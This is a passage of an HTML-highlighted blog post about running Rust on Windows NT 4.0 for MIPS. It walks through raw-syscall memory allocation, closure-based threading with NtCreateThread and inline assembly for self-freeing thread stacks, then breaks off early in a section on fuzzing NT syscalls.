<span class="k">pub</span> <span class="k">fn</span> <span class="nf">mmap</span><span class="p">(</span><span class="k">mut</span> <span class="n">addr</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span> <span class="k">mut</span> <span class="n">size</span><span class="p">:</span> <span class="nb">usize</span><span class="p">)</span> <span class="k">-></span> <span class="n">Result</span><span class="o"><*</span><span class="k">mut</span> <span class="nb">u8</span><span class="o">></span> <span class="p">{</span>
<span class="c">/// Commit memory</span>
<span class="k">const</span> <span class="n">MEM_COMMIT</span><span class="p">:</span> <span class="nb">u32</span> <span class="o">=</span> <span class="mi">0x1000</span><span class="p">;</span>
<span class="c">/// Reserve memory range</span>
<span class="k">const</span> <span class="n">MEM_RESERVE</span><span class="p">:</span> <span class="nb">u32</span> <span class="o">=</span> <span class="mi">0x2000</span><span class="p">;</span>
<span class="c">/// Readable and writable memory</span>
<span class="k">const</span> <span class="n">PAGE_READWRITE</span><span class="p">:</span> <span class="nb">u32</span> <span class="o">=</span> <span class="mi">0x4</span><span class="p">;</span>
<span class="c">// Perform syscall</span>
<span class="k">let</span> <span class="n">status</span> <span class="o">=</span> <span class="nf">NtStatus</span><span class="p">(</span><span class="k">unsafe</span> <span class="p">{</span>
<span class="nf">syscall6</span><span class="p">(</span>
<span class="c">// [in] HANDLE ProcessHandle,</span>
<span class="o">!</span><span class="mi">0</span><span class="p">,</span>
<span class="c">// [in, out] PVOID *BaseAddress,</span>
<span class="nd">addr_of_mut!</span><span class="p">(</span><span class="n">addr</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// [in] ULONG_PTR ZeroBits,</span>
<span class="mi">0</span><span class="p">,</span>
<span class="c">// [in, out] PSIZE_T RegionSize,</span>
<span class="nd">addr_of_mut!</span><span class="p">(</span><span class="n">size</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// [in] ULONG AllocationType,</span>
<span class="p">(</span><span class="n">MEM_COMMIT</span> <span class="p">|</span> <span class="n">MEM_RESERVE</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// [in] ULONG Protect</span>
<span class="n">PAGE_READWRITE</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// Syscall ID</span>
<span class="nn">Syscall</span><span class="p">::</span><span class="n">AllocateVirtualMemory</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="p">)</span>
<span class="p">}</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">);</span>
<span class="c">// If success, return allocation otherwise return status</span>
<span class="k">if</span> <span class="n">status</span><span class="nf">.success</span><span class="p">()</span> <span class="p">{</span>
<span class="nf">Ok</span><span class="p">(</span><span class="n">addr</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span><span class="p">)</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nf">Err</span><span class="p">(</span><span class="n">status</span><span class="p">)</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="c">/// Release memory range</span>
<span class="k">const</span> <span class="n">MEM_RELEASE</span><span class="p">:</span> <span class="nb">u32</span> <span class="o">=</span> <span class="mi">0x8000</span><span class="p">;</span>
<span class="c">/// De-allocate virtual memory in the current process</span>
<span class="k">pub</span> <span class="k">unsafe</span> <span class="k">fn</span> <span class="nf">munmap</span><span class="p">(</span><span class="k">mut</span> <span class="n">addr</span><span class="p">:</span> <span class="nb">usize</span><span class="p">)</span> <span class="k">-></span> <span class="n">Result</span><span class="o"><</span><span class="p">()</span><span class="o">></span> <span class="p">{</span>
<span class="c">// Region size</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">size</span> <span class="o">=</span> <span class="mi">0u</span><span class="n">size</span><span class="p">;</span>
<span class="c">// Perform syscall</span>
<span class="k">let</span> <span class="n">status</span> <span class="o">=</span> <span class="nf">NtStatus</span><span class="p">(</span><span class="nf">syscall4</span><span class="p">(</span>
<span class="c">// [in] HANDLE ProcessHandle,</span>
<span class="o">!</span><span class="mi">0</span><span class="p">,</span>
<span class="c">// [in, out] PVOID *BaseAddress,</span>
<span class="nd">addr_of_mut!</span><span class="p">(</span><span class="n">addr</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// [in, out] PSIZE_T RegionSize,</span>
<span class="nd">addr_of_mut!</span><span class="p">(</span><span class="n">size</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// [in] ULONG AllocationType,</span>
<span class="n">MEM_RELEASE</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// Syscall ID</span>
<span class="nn">Syscall</span><span class="p">::</span><span class="n">FreeVirtualMemory</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="p">)</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">);</span>
<span class="c">// Return error on error</span>
<span class="k">if</span> <span class="n">status</span><span class="nf">.success</span><span class="p">()</span> <span class="p">{</span>
<span class="nf">Ok</span><span class="p">(())</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nf">Err</span><span class="p">(</span><span class="n">status</span><span class="p">)</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>And viola. Now we can use <code class="language-plaintext highlighter-rouge">String</code>s, <code class="language-plaintext highlighter-rouge">Box</code>s, <code class="language-plaintext highlighter-rouge">Vec</code>s, <code class="language-plaintext highlighter-rouge">BTreeMap</code>s, and a whole
list of other standard data structures in Rust. At this point, other than
file I/O, networking, and threading, this environment is probably capable of
running pretty much any generic Rust code, just by implementing two simple
allocation functions. How cool is that!?</p>
<h2 id="threading">Threading</h2>
<p>Some terrible person in my chat just had to ask “what about threading support”.
Of course, this could be an off handed comment that I dismiss or laugh at, but
yeah, what about threading? After all, we want to write a fuzzer, and without
threads it’ll be hard to hit those juicy, totally necessary on 1996 software,
race conditions?!</p>
<p>Well, this threw us down a huge loop. First of all, how do we actually create
threads in Windows, and next, how do we do it in a Rust-style way of using
closures that can be <code class="language-plaintext highlighter-rouge">join()</code>ed to get the return result.</p>
<h3 id="creating-threads-on-windows">Creating threads on Windows</h3>
<p>Unfortunately, creating threads on Windows requires the <code class="language-plaintext highlighter-rouge">NtCreateThread()</code>
syscall. This is not documented, and honestly took a pretty long time to figure
out. You don’t actually give it a function pointer to execute and a parameter
like most thread creation libraries at a higher level.</p>
<p>Instead, you actually give it an entire <code class="language-plaintext highlighter-rouge">CONTEXT</code>. In Windows development, the
<code class="language-plaintext highlighter-rouge">CONTEXT</code> structure is a very-specific-to-your-architecture structure that
contains all of the CPU register state. So, you actually have to figure out
the correct <code class="language-plaintext highlighter-rouge">CONTEXT</code> shape for your architecture (usually there are multiple,
controlled by heavy <code class="language-plaintext highlighter-rouge">#ifdef</code>s). This might have taken us an hour to actually
figure out, I don’t remember.</p>
<p>On top of this, you also provide it the stack register. Yep, you heard that
right, you have to create the stack for the thread. This is yet another step
that I wasn’t really expecting that added to the complexity.</p>
<p>Anyways, at the end of the day, you launch a new thread in your process, you
give it a CPU context (and by nature a stack and target entry address), and
let it run off and do its thing.</p>
<p>However, this isn’t very Rust-like. Rust allows you to optionally <code class="language-plaintext highlighter-rouge">join()</code> on a
thread to get the return result from it, further, threads are started as
closures so you can pass in arbitrary parameters to the thread with super
convenient syntax either by <code class="language-plaintext highlighter-rouge">move</code> or by reference.</p>
<h4 id="threading-in-rust">Threading in Rust</h4>
<p>This leads to a hard-ish problem. How do we get Rust-style threads? Until we
wrote this, I never really even thought about it. Initially we thought about
some fancy static ways of doing it, but ultimately, due to using closures, you
<em>must</em> put information on the heap. It’s obvious in hindsight, but if you want
to move ownership of some of your stack locals into this thread, how are you
possibly going to do that without storing it somewhere. You can’t let the
thread use the parents stack, that wouldn’t work to well.</p>
<p>So, we implemented a <code class="language-plaintext highlighter-rouge">spawn</code> routine that would take in a closure (with the
same constraints of Rust’s own <code class="language-plaintext highlighter-rouge">std::thread::spawn</code>), put the closure into a
<code class="language-plaintext highlighter-rouge">Box</code>, turning it into a dynamically dispatched trait (vftables and friends),
while moving all of the variables captured by the closure into the heap.</p>
<p>We then can invoke <code class="language-plaintext highlighter-rouge">NtCreateThread()</code> with a stack that we created, point the
thread at a simple trampoline and pass in a pointer to the raw backing of the
<code class="language-plaintext highlighter-rouge">Box</code>. Then, in the trampoline, we can convert the raw pointer back into a
<code class="language-plaintext highlighter-rouge">Box</code> and invoke it! Now we’ve run the closure in the thread!</p>
<h4 id="return-values">Return values</h4>
<p>Unfortunately, this only gets us execution of the closure. We still have to
add the ability to get return values from the thread. This has a unique design
problem that the return value has to be accessible to the thread which created
it, while also being accessible to the thread itself to initialize. Since the
creator of the thread can also just ignore the result of the thread, we can’t
free the return storage if the creator doesn’t want it as the thread won’t
know that information (or you’d have to communicate it).</p>
<p>So, we ended up using an <code class="language-plaintext highlighter-rouge">Arc<></code>. This is an atomic reference counted heap
allocated structure in Rust, and it ensures that the value lives as long as
there is one reference. This works perfectly for this situation, we give one
copy of the <code class="language-plaintext highlighter-rouge">Arc</code> to the thread (ref count 1), and then another copy to the
creator of the thread (ref count 2). This way, the only way the storage for
the <code class="language-plaintext highlighter-rouge">Arc</code> is freed is if both the thread and creator are done with it.</p>
<p>Further, we need to ensure some level of synchronization with the thread as
the creator cannot check this return value of the thread until the thread
has initialized it. Luckily, we can accomplish this in two ways. One, when
a user <code class="language-plaintext highlighter-rouge">join()</code>s on a thread, it blocks until that thread finishes execution.
To do this we invoke <code class="language-plaintext highlighter-rouge">NtWaitForSingleObject()</code> that takes in a <code class="language-plaintext highlighter-rouge">HANDLE</code>, given
to us when we created the thread, and a timeout. By setting an infinite timeout
we can ensure that we do not do anything until the thread is done.</p>
<p>This leaves some implementation specific details about threads up in the air,
like what happens with thread early termination, crashes, etc. Thus, we want
to also ensure the return value has been updated in another way.</p>
<p>We did this by being creative with the <code class="language-plaintext highlighter-rouge">Arc</code> reference count. The <code class="language-plaintext highlighter-rouge">Arc</code>
reference count can only be decreased by the thread when the <code class="language-plaintext highlighter-rouge">Arc</code> goes out
of scope, and due to the way we designed the thread, this can only happen once
the value has been successfully initialized.</p>
<p>Thus, in our main thread, we can call <code class="language-plaintext highlighter-rouge">Arc::try_unwrap()</code> on our return value,
this will only succeed if we are the only reference to the <code class="language-plaintext highlighter-rouge">Arc</code>, thus
atomically ensuring that the thread has successfully updated the return value!</p>
<p>Now we have full Rust-style threading, ala:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="k">-></span> <span class="n">Result</span><span class="o"><</span><span class="p">(),</span> <span class="p">()</span><span class="o">></span> <span class="p">{</span>
<span class="k">let</span> <span class="n">a_local_value</span> <span class="o">=</span> <span class="mi">5</span><span class="p">;</span>
<span class="k">let</span> <span class="n">thr</span> <span class="o">=</span> <span class="nn">syscall</span><span class="p">::</span><span class="nf">spawn</span><span class="p">(</span><span class="k">move</span> <span class="p">||</span> <span class="p">{</span>
<span class="nd">println!</span><span class="p">(</span><span class="s">"Hello world from Rust thread {}"</span><span class="p">,</span> <span class="n">a_local_value</span><span class="p">);</span>
<span class="nn">core</span><span class="p">::</span><span class="nn">cell</span><span class="p">::</span><span class="nn">RefCell</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="mi">22</span><span class="p">)</span>
<span class="p">})</span><span class="nf">.unwrap</span><span class="p">();</span>
<span class="nd">println!</span><span class="p">(</span><span class="s">"Return val: {:?}"</span><span class="p">,</span> <span class="n">thr</span><span class="nf">.join</span><span class="p">()</span><span class="nf">.unwrap</span><span class="p">());</span>
<span class="nf">Ok</span><span class="p">(())</span>
<span class="p">}</span>
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Serving 23500 bytes to 192.168.1.2:46026
---------------------------------
Hello world from Rust thread 5
Return val: RefCell { value: 22 }
</code></pre></div></div>
<p>HOW COOL IS THAT!? RIGHT!? This is on MIPS for Windows NT 4.0, an operating
system from almost 20 years prior to Rust even existing! We have all the safety
and fun features of bounds checking, dynamically growing vectors, scope-based
dropping of references, locks, and allocations, etc.</p>
<h4 id="cleaning-it-all-up">Cleaning it all up</h4>
<p>Unfortunately, we have a few leaks. We leak the handle that we got from when
we created the thread, and we also leak the stack of the thread itself. This
is actually a tough-ish problem. How do we free the stack of a thread when we
don’t know when it exits (as the creator of the thread might never <code class="language-plaintext highlighter-rouge">join()</code>
it).</p>
<p>Well, the first problem is easy. Implement a <code class="language-plaintext highlighter-rouge">Handle</code> type, implement a <code class="language-plaintext highlighter-rouge">Drop</code>
handler on it, and Rust will automatically clean up the handle when it goes
out of scope by calling the <code class="language-plaintext highlighter-rouge">NtClose()</code> in our <code class="language-plaintext highlighter-rouge">Drop</code> handler. Phew, that’s
easy.</p>
<p>Freeing the stack is a bit harder, but we decided that the best route would
be to have the thread free its own stack. This isn’t too hard, it just means
that we must free the stack and exit the thread without touching the stack,
ideally without using any globals as that would have race conditions.</p>
<p>Luckily, we can do this just fine if we implement the syscalls we need directly
in one assembly block where we know we have full control.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// Region size</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">rsize</span> <span class="o">=</span> <span class="mi">0u</span><span class="n">size</span><span class="p">;</span>
<span class="c">// Free the stack and then exit the thread. We do this in one assembly</span>
<span class="c">// block to ensure we don't touch any stack memory during this stage</span>
<span class="c">// as we are freeing the stack.</span>
<span class="k">unsafe</span> <span class="p">{</span>
<span class="nd">asm!</span><span class="p">(</span><span class="s">r#"
// Set the link register
jal 2f
// Exit thread
jal 3f
break
2:
// NtFreeVirtualMemory()
li $v0, {free}
syscall
3:
// NtTerminateThread()
li $v0, {terminate}
li $a0, -2 // GetCurrentThread()
li $a1, 0 // exit code
syscall
"#</span><span class="p">,</span> <span class="n">terminate</span> <span class="o">=</span> <span class="k">const</span> <span class="nn">Syscall</span><span class="p">::</span><span class="n">TerminateThread</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="n">free</span> <span class="o">=</span> <span class="k">const</span> <span class="nn">Syscall</span><span class="p">::</span><span class="n">FreeVirtualMemory</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="nf">in</span><span class="p">(</span><span class="s">"$4"</span><span class="p">)</span> <span class="o">!</span><span class="mi">0u</span><span class="n">size</span><span class="p">,</span>
<span class="nf">in</span><span class="p">(</span><span class="s">"$5"</span><span class="p">)</span> <span class="nd">addr_of_mut!</span><span class="p">(</span><span class="n">stack</span><span class="p">),</span>
<span class="nf">in</span><span class="p">(</span><span class="s">"$6"</span><span class="p">)</span> <span class="nd">addr_of_mut!</span><span class="p">(</span><span class="n">rsize</span><span class="p">),</span>
<span class="nf">in</span><span class="p">(</span><span class="s">"$7"</span><span class="p">)</span> <span class="n">MEM_RELEASE</span><span class="p">,</span> <span class="nf">options</span><span class="p">(</span><span class="n">noreturn</span><span class="p">));</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Interestingly we do technically have to pass a stack variable to
<code class="language-plaintext highlighter-rouge">NtFreeVirtualMemory()</code> but that’s actually okay as either the kernel updates
that variable before freeing the stack, and thus it’s fine, or it updates the
variable as an untrusted user pointer after freeing the stack, and returns
with an error. We don’t really care either way as the stack is freed. Then,
all we have to do is call <code class="language-plaintext highlighter-rouge">NtTerminateThread()</code> and we’re all done.</p>
<p>Huzzah, fancy Rust threading, no memory leaks, (hopefully) no race conditions.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">/// Spawn a thread</span>
<span class="c">///</span>
<span class="c">/// MIPS specific due to some inline assembly as well as MIPS-specific context</span>
<span class="c">/// structure creation.</span>
<span class="k">pub</span> <span class="k">fn</span> <span class="n">spawn</span><span class="o"><</span><span class="n">F</span><span class="p">,</span> <span class="n">T</span><span class="o">></span><span class="p">(</span><span class="n">f</span><span class="p">:</span> <span class="n">F</span><span class="p">)</span> <span class="k">-></span> <span class="n">Result</span><span class="o"><</span><span class="n">JoinHandle</span><span class="o"><</span><span class="n">T</span><span class="o">>></span>
<span class="k">where</span> <span class="n">F</span><span class="p">:</span> <span class="nf">FnOnce</span><span class="p">()</span> <span class="k">-></span> <span class="n">T</span><span class="p">,</span>
<span class="n">F</span><span class="p">:</span> <span class="nb">Send</span> <span class="o">+</span> <span class="nv">'static</span><span class="p">,</span>
<span class="n">T</span><span class="p">:</span> <span class="nb">Send</span> <span class="o">+</span> <span class="nv">'static</span> <span class="p">{</span>
<span class="c">// Holder for returned client handle</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">handle</span> <span class="o">=</span> <span class="mi">0u</span><span class="n">size</span><span class="p">;</span>
<span class="c">// Placeholder for returned client ID</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">client_id</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0u</span><span class="n">size</span><span class="p">;</span> <span class="mi">2</span><span class="p">];</span>
<span class="c">// Create a new context</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">context</span><span class="p">:</span> <span class="n">Context</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="nn">core</span><span class="p">::</span><span class="nn">mem</span><span class="p">::</span><span class="nf">zeroed</span><span class="p">()</span> <span class="p">};</span>
<span class="c">// Allocate and leak a stack for the thread</span>
<span class="k">let</span> <span class="n">stack</span> <span class="o">=</span> <span class="nd">vec!</span><span class="p">[</span><span class="mi">0u8</span><span class="p">;</span> <span class="mi">4096</span><span class="p">]</span><span class="nf">.leak</span><span class="p">();</span>
<span class="c">// Initial TEB, maybe some stack stuff in here!?</span>
<span class="k">let</span> <span class="n">initial_teb</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0u32</span><span class="p">;</span> <span class="mi">5</span><span class="p">];</span>
<span class="c">/// External thread entry point</span>
<span class="k">extern</span> <span class="k">fn</span> <span class="n">entry</span><span class="o"><</span><span class="n">F</span><span class="p">,</span> <span class="n">T</span><span class="o">></span><span class="p">(</span><span class="n">func</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="n">F</span><span class="p">,</span>
<span class="n">ret</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="n">UnsafeCell</span><span class="o"><</span><span class="n">MaybeUninit</span><span class="o"><</span><span class="n">T</span><span class="o">>></span><span class="p">,</span>
<span class="k">mut</span> <span class="n">stack</span><span class="p">:</span> <span class="nb">usize</span><span class="p">)</span> <span class="k">-></span> <span class="o">!</span>
<span class="k">where</span> <span class="n">F</span><span class="p">:</span> <span class="nf">FnOnce</span><span class="p">()</span> <span class="k">-></span> <span class="n">T</span><span class="p">,</span>
<span class="n">F</span><span class="p">:</span> <span class="nb">Send</span> <span class="o">+</span> <span class="nv">'static</span><span class="p">,</span>
<span class="n">T</span><span class="p">:</span> <span class="nb">Send</span> <span class="o">+</span> <span class="nv">'static</span> <span class="p">{</span>
<span class="c">// Create a scope so that we drop `Box` and `Arc`</span>
<span class="p">{</span>
<span class="c">// Re-box the FFI'd type</span>
<span class="k">let</span> <span class="n">func</span><span class="p">:</span> <span class="nb">Box</span><span class="o"><</span><span class="n">F</span><span class="o">></span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span>
<span class="nn">Box</span><span class="p">::</span><span class="nf">from_raw</span><span class="p">(</span><span class="n">func</span><span class="p">)</span>
<span class="p">};</span>
<span class="c">// Re-box the return type</span>
<span class="k">let</span> <span class="n">ret</span><span class="p">:</span> <span class="nb">Arc</span><span class="o"><</span><span class="n">UnsafeCell</span><span class="o"><</span><span class="n">MaybeUninit</span><span class="o"><</span><span class="n">T</span><span class="o">>>></span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span>
<span class="nn">Arc</span><span class="p">::</span><span class="nf">from_raw</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span>
<span class="p">};</span>
<span class="c">// Call the closure and save the return</span>
<span class="k">unsafe</span> <span class="p">{</span> <span class="p">(</span><span class="o">&</span><span class="k">mut</span> <span class="o">*</span><span class="n">ret</span><span class="nf">.get</span><span class="p">())</span><span class="nf">.write</span><span class="p">(</span><span class="nf">func</span><span class="p">());</span> <span class="p">}</span>
<span class="p">}</span>
<span class="c">// Region size</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">rsize</span> <span class="o">=</span> <span class="mi">0u</span><span class="n">size</span><span class="p">;</span>
<span class="c">// Free the stack and then exit the thread. We do this in one assembly</span>
<span class="c">// block to ensure we don't touch any stack memory during this stage</span>
<span class="c">// as we are freeing the stack.</span>
<span class="k">unsafe</span> <span class="p">{</span>
<span class="nd">asm!</span><span class="p">(</span><span class="s">r#"
// Set the link register
jal 2f
// Exit thread
jal 3f
break
2:
// NtFreeVirtualMemory()
li $v0, {free}
syscall
3:
// NtTerminateThread()
li $v0, {terminate}
li $a0, -2 // GetCurrentThread()
li $a1, 0 // exit code
syscall
"#</span><span class="p">,</span> <span class="n">terminate</span> <span class="o">=</span> <span class="k">const</span> <span class="nn">Syscall</span><span class="p">::</span><span class="n">TerminateThread</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="n">free</span> <span class="o">=</span> <span class="k">const</span> <span class="nn">Syscall</span><span class="p">::</span><span class="n">FreeVirtualMemory</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="nf">in</span><span class="p">(</span><span class="s">"$4"</span><span class="p">)</span> <span class="o">!</span><span class="mi">0u</span><span class="n">size</span><span class="p">,</span>
<span class="nf">in</span><span class="p">(</span><span class="s">"$5"</span><span class="p">)</span> <span class="nd">addr_of_mut!</span><span class="p">(</span><span class="n">stack</span><span class="p">),</span>
<span class="nf">in</span><span class="p">(</span><span class="s">"$6"</span><span class="p">)</span> <span class="nd">addr_of_mut!</span><span class="p">(</span><span class="n">rsize</span><span class="p">),</span>
<span class="nf">in</span><span class="p">(</span><span class="s">"$7"</span><span class="p">)</span> <span class="n">MEM_RELEASE</span><span class="p">,</span> <span class="nf">options</span><span class="p">(</span><span class="n">noreturn</span><span class="p">));</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">let</span> <span class="n">rbox</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span>
<span class="c">/// Control context</span>
<span class="k">const</span> <span class="n">CONTEXT_CONTROL</span><span class="p">:</span> <span class="nb">u32</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="c">/// Floating point context</span>
<span class="k">const</span> <span class="n">CONTEXT_FLOATING_POINT</span><span class="p">:</span> <span class="nb">u32</span> <span class="o">=</span> <span class="mi">2</span><span class="p">;</span>
<span class="c">/// Integer context</span>
<span class="k">const</span> <span class="n">CONTEXT_INTEGER</span><span class="p">:</span> <span class="nb">u32</span> <span class="o">=</span> <span class="mi">4</span><span class="p">;</span>
<span class="c">// Set the flags for the registers we want to control</span>
<span class="n">context</span><span class="py">.context.bits64.flags</span> <span class="o">=</span>
<span class="n">CONTEXT_CONTROL</span> <span class="p">|</span> <span class="n">CONTEXT_FLOATING_POINT</span> <span class="p">|</span> <span class="n">CONTEXT_INTEGER</span><span class="p">;</span>
<span class="c">// Thread entry point</span>
<span class="n">context</span><span class="py">.context.bits64.fir</span> <span class="o">=</span> <span class="nn">entry</span><span class="p">::</span><span class="o"><</span><span class="n">F</span><span class="p">,</span> <span class="n">T</span><span class="o">></span> <span class="k">as</span> <span class="nb">usize</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">;</span>
<span class="c">// Set `$a0` argument</span>
<span class="k">let</span> <span class="n">cbox</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="n">F</span> <span class="o">=</span> <span class="nn">Box</span><span class="p">::</span><span class="nf">into_raw</span><span class="p">(</span><span class="nn">Box</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="n">f</span><span class="p">));</span>
<span class="n">context</span><span class="py">.context.bits64.int</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">=</span> <span class="n">cbox</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">;</span>
<span class="c">// Create return storage in `$a1`</span>
<span class="k">let</span> <span class="n">rbox</span><span class="p">:</span> <span class="nb">Arc</span><span class="o"><</span><span class="n">UnsafeCell</span><span class="o"><</span><span class="n">MaybeUninit</span><span class="o"><</span><span class="n">T</span><span class="o">>>></span> <span class="o">=</span>
<span class="nn">Arc</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nn">UnsafeCell</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nn">MaybeUninit</span><span class="p">::</span><span class="nf">uninit</span><span class="p">()));</span>
<span class="n">context</span><span class="py">.context.bits64.int</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="nn">Arc</span><span class="p">::</span><span class="nf">into_raw</span><span class="p">(</span><span class="n">rbox</span><span class="nf">.clone</span><span class="p">())</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">;</span>
<span class="c">// Pass in stack in `$a2`</span>
<span class="n">context</span><span class="py">.context.bits64.int</span><span class="p">[</span><span class="mi">6</span><span class="p">]</span> <span class="o">=</span> <span class="n">stack</span><span class="nf">.as_mut_ptr</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">;</span>
<span class="c">// Set the 64-bit `$sp` to the end of the stack</span>
<span class="n">context</span><span class="py">.context.bits64.int</span><span class="p">[</span><span class="mi">29</span><span class="p">]</span> <span class="o">=</span>
<span class="n">stack</span><span class="nf">.as_mut_ptr</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u64</span> <span class="o">+</span> <span class="n">stack</span><span class="nf">.len</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">;</span>
<span class="n">rbox</span>
<span class="p">};</span>
<span class="c">// Create the thread</span>
<span class="k">let</span> <span class="n">status</span> <span class="o">=</span> <span class="nf">NtStatus</span><span class="p">(</span><span class="k">unsafe</span> <span class="p">{</span>
<span class="nf">syscall8</span><span class="p">(</span>
<span class="c">// OUT PHANDLE ThreadHandle</span>
<span class="nd">addr_of_mut!</span><span class="p">(</span><span class="n">handle</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// IN ACCESS_MASK DesiredAccess</span>
<span class="mi">0x1f03ff</span><span class="p">,</span>
<span class="c">// IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL</span>
<span class="mi">0</span><span class="p">,</span>
<span class="c">// IN HANDLE ProcessHandle</span>
<span class="o">!</span><span class="mi">0</span><span class="p">,</span>
<span class="c">// OUT PCLIENT_ID ClientId</span>
<span class="nd">addr_of_mut!</span><span class="p">(</span><span class="n">client_id</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// IN PCONTEXT ThreadContext,</span>
<span class="nd">addr_of!</span><span class="p">(</span><span class="n">context</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// IN PINITIAL_TEB InitialTeb</span>
<span class="nd">addr_of!</span><span class="p">(</span><span class="n">initial_teb</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// IN BOOLEAN CreateSuspended</span>
<span class="mi">0</span><span class="p">,</span>
<span class="c">// Syscall number</span>
<span class="nn">Syscall</span><span class="p">::</span><span class="n">CreateThread</span> <span class="k">as</span> <span class="nb">usize</span>
<span class="p">)</span>
<span class="p">}</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">);</span>
<span class="c">// Convert error to Rust error</span>
<span class="k">if</span> <span class="n">status</span><span class="nf">.success</span><span class="p">()</span> <span class="p">{</span>
<span class="nf">Ok</span><span class="p">(</span><span class="nf">JoinHandle</span><span class="p">(</span><span class="nf">Handle</span><span class="p">(</span><span class="n">handle</span><span class="p">),</span> <span class="n">rbox</span><span class="p">))</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nf">Err</span><span class="p">(</span><span class="n">status</span><span class="p">)</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<h4 id="fun-oddities">Fun oddities</h4>
<p>While doing this work it was fun to notice that it seems that threads do not
die upon crashing. It would appear that the thread initialization thunk that
Windows normally shims in when you create a thread must register some sort of
exception handler which then fires and the thread itself reports the
information to the kernel. At least in this version of NT, the thread did not
die, and the process didn’t crash as a whole.</p>
<h2 id="fuzzing-windows-nt">“Fuzzing” Windows NT</h2>
<p><img src="/assets/nt4_bsod.png" alt="Windows NT 4.0 blue screen of death" /></p>
<p>Of course, the point of this project was to fuzz Windows NT. Well, it turns out
that literally the very first thing we did… randomly invoke a syscall, was
all it took.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">/// Worker thread for fuzzing</span>
<span class="k">fn</span> <span class="nf">worker</span><span class="p">(</span><span class="n">id</span><span class="p">:</span> <span class="nb">usize</span><span class="p">)</span> <span class="p">{</span>
<span class="c">// Create an RNG</span>
<span class="k">let</span> <span class="n">rng</span> <span class="o">=</span> <span class="nn">Rng</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="mi">0xe06fc2cdf7b80594</span> <span class="o">+</span> <span class="n">id</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">);</span>
<span class="k">loop</span> <span class="p">{</span>
<span class="k">unsafe</span> <span class="p">{</span>
